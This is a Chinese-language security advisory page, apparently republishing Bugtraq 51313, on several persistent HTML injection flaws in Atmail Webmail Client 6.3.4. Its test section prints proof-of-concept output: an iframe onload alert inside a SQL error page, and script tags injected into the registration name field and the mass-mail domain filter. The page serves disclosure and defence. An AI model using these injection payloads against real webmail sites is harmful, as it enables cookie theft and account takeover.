Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Atmail Webmail Client多个HTML代码注入漏洞

发布日期:2012-01-09
更新日期:2012-01-10受影响系统:
@Mail Atmail Webmail Client 6.3.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51313Atmail是商业化Linux消息传送平台提供者。Atmail Webmail Client将用户提供的输入用作动态内容之前没有正确过滤,在实现上存在多个HTML注入漏洞,成功利用可允许攻击者在受影响站点的用户浏览器中执行任意HTML和脚本代码,窃取Cookie身份验证凭证或控制站点外观。<*来源:Benjamin Kunz Mejri
 
  链接:http://seclists.org/fulldisclosure/2012/Jan/94
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Benjamin Kunz Mejri ()提供了如下测试方法:Code Review: Exception Handling of the Application Service<div id="primary_content_inner" style="padding: 20px; overflow: auto; height: 100%;">
                       
?????SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual
that
corresponds to your MySQL server version for the right syntax to use near &apos;"><EXECUTION OF MALICIOUS SCRIPT CODE")&apos;
<="" where&apos;="" at="" line="" 1="" <h2="">Application error</h2>         
                <h3>Exception information:<
/h3>
                <p>
                <b>Message:<br></b> SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the
right syntax to use near &apos;"><iframe src=a onload=alert("PERSISTENT") < where&apos; at line 1
                </p>
                       
<strong>Thrown in:</strong> /usr/local/atmail/webmail/library/Zend/Db/Statement/Pdo.php, Line #:234, Code #: 42000
               
<h3>Stack trace:</h3>
                <pre>#0 /usr/local/atmail/webmail/library/Zend/Db/Statement.php(300):
Zend_Db_Statement_Pdo->_execute(Array)
#1 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(468): Zend_Db_Statement->execute(Array)
#2 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query(&apos;select
count(id...&apos;, Array)
#3 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(799): Zend_Db_Adapter_Pdo_Abstract->query(&apos;select
count(id...&apos;, Array)
#4/usr/local/atmail/webmail/application/models/api.php(3270): Zend   ...    ... Code Review: Adding New User - Userverwaltung  or User Registration<tr>
                <td class="contact_field" align="top">
                       
Firstname               </td>
                <td>
                       
<input class="" maxlength="128" name="UserFirstName" id="UserFirstName"
value="<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>"></td>
        </tr>        <tr>
                <td class="contact_field" align="top">
Lastname                </td>
                <td><input class="default" maxlength="128" name="UserLastName" id="UserLastName" value="Last Name">
               
</td>
        </tr> 
Code Review: Mass Mail - Output<td class="label">Filter by domain:</td>
<td class="filterinput">
<input name="aliasFilter" id="aliasFilter" class="panelFilter" value=""<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>" type="text"> <small>Specify a domain or email to filter results</small>
</td>
<td class="filterdomain"></td>
</tr>              
</tbody></table>建议:
--------------------------------------------------------------------------------
厂商补丁:@Mail
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.securityfocus.com/bid/51313/www.atmail.comAtmail Webmail多个HTML代码注入漏洞McAfee Relay Server产品安装开放代理漏洞相关资讯      Atmail 
  • Atmail Webmail Server不明细节安  (01/14/2014 19:23:26)
  • Atmail Email Server HTML注入和跨  (07/26/2012 08:38:50)
  • WebMail 全套解决方案 Atmail 6.3.  (02/28/2012 08:18:43)
  • Atmail WebMail跨站脚本漏洞(CVE-  (03/29/2013 14:08:35)
  • AtMail多个安全漏洞  (03/28/2012 06:35:19)
  • Atmail Webmail多个HTML代码注入漏  (01/11/2012 09:28:33)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经